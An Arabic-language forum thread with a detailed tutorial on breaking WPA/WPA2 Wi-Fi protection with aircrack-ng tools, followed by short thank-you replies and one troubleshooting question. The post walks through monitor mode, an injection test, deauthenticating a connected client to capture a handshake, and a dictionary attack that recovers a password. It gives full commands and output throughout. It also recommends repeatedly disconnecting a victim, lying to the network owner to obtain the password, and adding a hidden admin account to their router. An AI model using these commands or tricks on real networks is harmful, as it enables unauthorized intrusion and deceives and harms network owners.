![]() |
كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل [align=center]السلام عليكم ورحمة الله وبركاته أضع بين أيديكم .. شرح كيفية كسر حماية وايرلس نوع التشفير اللي فيها wpa/wpa2 وهو يعتبر من اقوى الحمايات .. والذي يعتمد على فصل أحد المشتركين او المتصلين بالراوتر ثم الحصول على هاند شيك... يعني أن نحصل على ملف كاب الذي يتم تخمين كلمة السر الموجودة فيه الأدوات المستخدمة .. airodump aireplay aircrack والعمل تحت نظام لينوكس توزيعه باك تراك4 لأنهم موجودين فيه وما في داعي نزلهم الأن أكثر المستخدمين هم لتوزيعه أوبونتو .. أقول نزلو حزمة aircrack لكن يختلف مكان الإستخدام من الشيل لأن ممكن واحد وضعها في مكان وهو عم ينفذ الأمر من مكان .. وتنهال الأسئلة علي .. انه لم يشتغل .. أقول ان لم تعرف كيف تنزل .. ومن أين تكتب الأوامر . . تعلم على المبادىء بعدين لكل حادث حديث قد يسأل البعض كيف بعرفها .. وبميزها من web أقول أولا يجب معرفة اسم كرت النت وورك الهوائي الموجود عندك ولمعرفه ذلك تكتب في الشيل iwconfig اللي مكتوب بجنبه no wireless extensions. يعني مش كرت وايرلس اما المكتوب بجنبه مثل هالكلام كود: wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated Tx-Power=27 dBm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 عندي اسمه wlan0 قد يكون عند الغير eth1 او حسب اسمه يكون هو الكرت .. قد نجد أكثر من واحد .. لأن الشخص ممكن يكون عنده أكثر من كرت بجهازه هو مركبهم .. ولمستخدمي اللابتوبات .. أكيد يوجد كرت هوائي .. ولمعرف اسمه نفعل مثل فوق الأن عرفنا اسم الكرت الهوائي .. أول شي نشغل الكرت على المونيتور .. يعني المراقبة airmon-ng start wlan0 قد يشتغل المونيتور ليس على نفس الإسم كود: root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0]air (monitor mode enabled on mon0) كما قال هنا أنه تم تفعيل المراقبة على اسم mon0 هنا كل واحد لازم يعرف وأنا سأكمل حسب الموجود عندي بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس وهو ضروري جدا .. ولمعرف ذلك أكتب بعدين airodump-ng mon0 حتى نشوف الراوترات المحيطة بنا كود: CH 8 ][ Elapsed: 12 s ][ 2010-03-12 10:39 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:9F:D3:1F:EB -48 24 0 0 1 54 WPA2 CCMP PSK ThomsonE2A46B BSSID STATION PWR Rate Lost Packets Probes 00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -49 0 -24 38 20 ThomsonE2A46B الأن كما نلاحظ أن نوع الحمايه هو wpa2 psk pre shared key يعني لازم يتم فصل مستخدم حتى نحصل على ملف الكاب لنكسره فيما بعد والمهم للكسر هو معرفة القناة CH .. channel اللي شغالة عليها الراوتر هنا هي القناة 1 كم نلاحظ تحت CH وأهم شي .. هو الماك أدريس للراوتر وللمستخدم الان نوقف المراقبة على أسماء الكروت .. (يمكننا أن نعمل مراقبة ,, لكن رح يطلع اسم كرت غير .. حست نوعية الكرت .. وهو هل حديث .. لأنه بهالحالة يقدم خصائص متميزة) المهم سأشرح الأسهل والموجود عند الجميع كود: airmon-ng stop mon0 airmon-ng stop wlan0 root@bt:~# airmon-ng stop mon0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] mon0 Atheros ath5k - [phy0] (removed) root@bt:~# airmon-ng stop wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode disabled) هكذا نكون وقفنا المراقبة الأن نعيد تشغيلها لكن على القناة الخاصة بالراوتر اللي يجب أن نكسرهاوهي هنا رقم 1 كود: airmon-ng start wlan0 1 root@bt:~# airmon-ng start wlan0 1 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) اخبرنا أن المراقبة شغالة على mon0 بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس وهو ضروري جدا .. ولمعرف ذلك أكتب كود: aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0 3:1F:EB mon0 -9 لمعرفة إذا يدعم الحقن -e وبعدها اسم الراوتر -a وبعدها الماك ادريس للراوتر mon0 اسم الكرت اللي شغلنا المراقبة عليه نلاحظ شو يطلعلنا كود: 11:10:48 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1 11:10:48 Trying broadcast probe requests... 11:10:48 Injection is working! 11:10:49 Found 1 AP 11:10:49 Trying directed probe requests... 11:10:49 00:1F:9F:D3:1F:EB - channel: 1 - 'ThomsonE2A46B' 11:10:49 Ping (min/avg/max): 1.249ms/3.204ms/6.293ms Power: -41.93 11:10:49 30/30: 100% نلاحظ 11:10:48 Injection is working! 11:10:49 30/30: 100% يعني كل شي شغال وتمام ملاحظة .. يجب أن تكون قريب كفاية من الراوتر ..او عندك مقـوي اشارة الأن لمراقبة الراوتر ومستخدميها نكتب كود: airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0 -c 1 يعني القناة 1 وهي الموجود عليها الراوتر --bssid وبعدها الماك أدريس للراوتر -w وبعدها اسم الملف الذي سيخرج للحصول على شبك وهاند شيك mon0 اسم الكرت اللي تم عليه المراقبة نلاحظ كود: CH 1 ][ Elapsed: 1 min ][ 2010-03-12 10:50 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:9F:D3:1F:EB -44 100 1120 35 0 1 54 WPA2 CCMP PSK ThomsonE2A46B BSSID STATION PWR Rate Lost Packets Probes 00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -47 1 -36 0 785 الأن المراقبة شغالة .. وأذكر انه مهم ان يظهر على اليمين في الأعلي handshake الأن للحصول على هاند شيك يجب فصل المستخدم على الراوتر فنستخدم هذا الأمرفي شاشة شيل تانية كود: aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 -0 لعمل deauthentication والرقم 1 هو يعني مرة واحدة .. اننا سنفصل مرة واحدة (ملاحظة .. يمكننا استخدام الهندسة الإجتماعية ان لم ننجح بمعرفة كلمة السر .. وهو ان نفصل حوالي مليون مرة .. ونقول لصاحب الشكبة اننا نعرف الحل ويمكننا المساعده .. لكن يجب معرفة كلمة السر والدخول للراوتر ومن هالحكي الكذب ههه هو يوثق فينا .. وعندها ندخل للراوتر .. نضيف مستخدم دخول مع كلمة سر خاصة به ونغير اللي بدنا اياه هههه .. طريقة نافعه .. ونجحت معي ) -a الماك أدريس للراوتر -c الماك أدريس للمستخدم اللي نريد فصله mon0 اسم الكرت اللي نراقب عليه .. نلاحظ شو يطلعلنا كود: root@bt:~# aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 10:56:20 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1 10:56:21 Sending 64 directed DeAuth. STMAC: [00:13:CE:4F:B5:51] [16|66 ACKs] بعد تطبيق الأمر .. نكون فصلنا مستخدم وقطعنا عنه الإتصال ثم عاد ودخل ونكون نحن حصلنا على ملف الكاب اللي فيه كلمة السر ويجب تخمينها .. كود: CH 1 ][ Elapsed: 6 mins ][ 2010-03-12 10:57 ][ WPA handshake: 00:1F:9F:D3:1F:EB BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:9F:D3:1F:EB -44 100 4060 115 2 1 54 WPA2 CCMP PSK ThomsonE2A46B BSSID STATION PWR Rate Lost Packets Probes 00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -42 54 - 2 0 2976 نلاحظ على اليمين في الأعلى WPA handshake: 00:1F:9F:D3:1F:EB وهي مهمة .. وتعني أنه تم الفصل الأن حصلنا على ملف الكاب .. ويمكننا أنو نوقف المراقبة الأن يعني نوقف ال airodump-ng ما عدنا محتاجينها الأن جاء الدور المهم وهو تخمين كلمة السر(أقول تخمين لأن هذه الحماية بدها تخمين .. مش متل الويب نجمع باكيتس ونكسرهم) نستخدم الأن ونكتب كود: aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap -w بعدها مكان وجود ملف الباسووردات -b الماك أدريس للراوتر tt*.cap هو اسم ملف الكاب وهنا أعود وأذكر أنه نحن الأن نخمن كلمة السر من ملف فيه باسووردات كثيرة بمعنى أخر أنه يجب ان تكون كلمة السر موجودة داخل الملف حتى يتم اكتشافها .. وهنا تعتمد على مدى قوة وكبر ملف الباسووردات وسأنفذ الأمر عندي كود: aircrack-ng -w /pentest/passwords/wordlists/bt4-password.txt -b 00:1F:9F:D3:1F:EB tt*.cap ونلاحظ أنه تم معرفة كلمة السر كود: Aircrack-ng 1.0 r1668 [00:00:00] 12 keys tested (235.19 k/s) KEY FOUND! [ alaa123123 ] Master Key : B1 67 C3 CE 94 25 20 85 7F EC E6 16 30 8E 61 26 4A 36 6D A6 0A 22 43 19 79 E4 09 A7 6C 8F 62 A8 Transient Key : E8 52 16 BB C0 3D 48 E3 C8 D0 90 10 6E 76 68 11 FE 6F F6 9D EE 1F AE EF D9 0F 44 0A 4F 11 14 F7 1A 47 5E 29 FA 7B CD 5A 81 47 8A EA 0B B1 C3 B9 D3 C7 C2 41 73 2A 8B 6A 29 8F C9 AC CF B1 A3 A3 EAPOL HMAC : 3F EB 20 C8 BD C5 35 7F F4 1A 42 C2 6B 45 58 44 والكلمة هي alaa123123 كنت بدي سوي الشرح فيديو .. لكن قلت ما في داعي .. وعلى فكر الدروس الكتابية أفضل إعادة سريعه ومختصرة 1- aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0 لمعرفة هل يدعم الحقن 2- airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0 لمراقبة الراوتر 3- aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 لفصل مستخدم 4- aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap لعمل تخمين وإيجاد كلمة السر .. وبالنهايةاذكر على انه يجب أن تكون كلمة السر موجودة بالملف وإلا لن يجدها لأننا هنا نعتمد على التخمين وليس الكسر [/align] |
الف شكر |
مشكور بس لو تسوي فيديو أحسن |
مششششششششششششششششششششششششكور اخي |
: didas :: didas :: didas :: didas :: didas :: didas :: didas : |
مشكور أخي الكريم.. يعطيك ألف عافية |
رد: كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل thaaaaanks this is what i m waiting for |
رد: كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل مشكور |
رد: كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل السلام عليكم لما انت طبقت الامر aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0 كانت الناتيجة اقتباس:
كانت الناتيجة اقتباس:
Intel 3945ABG iwl3945 هل دة معناه اني بعيد عن الروتر ولا الكارت لا يدعم الحقن |
رد: كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل شكرا |
رد: كسر تشفير وايرلس عليها حماية نوع wpa/wpa2 بالتفصيل الممل اخي احمد توجد في كارت او قطع الفا لاتدعم حقن ولكن قليله نوعا ما المهم مو مشكله شوف ملف الهاند شيك يطلع عندك لو لا اذا ما يطلع يمك انته بعيد عن الشبكة |
الساعة الآن 05:33 AM |
[ vBspiders.Com Network ]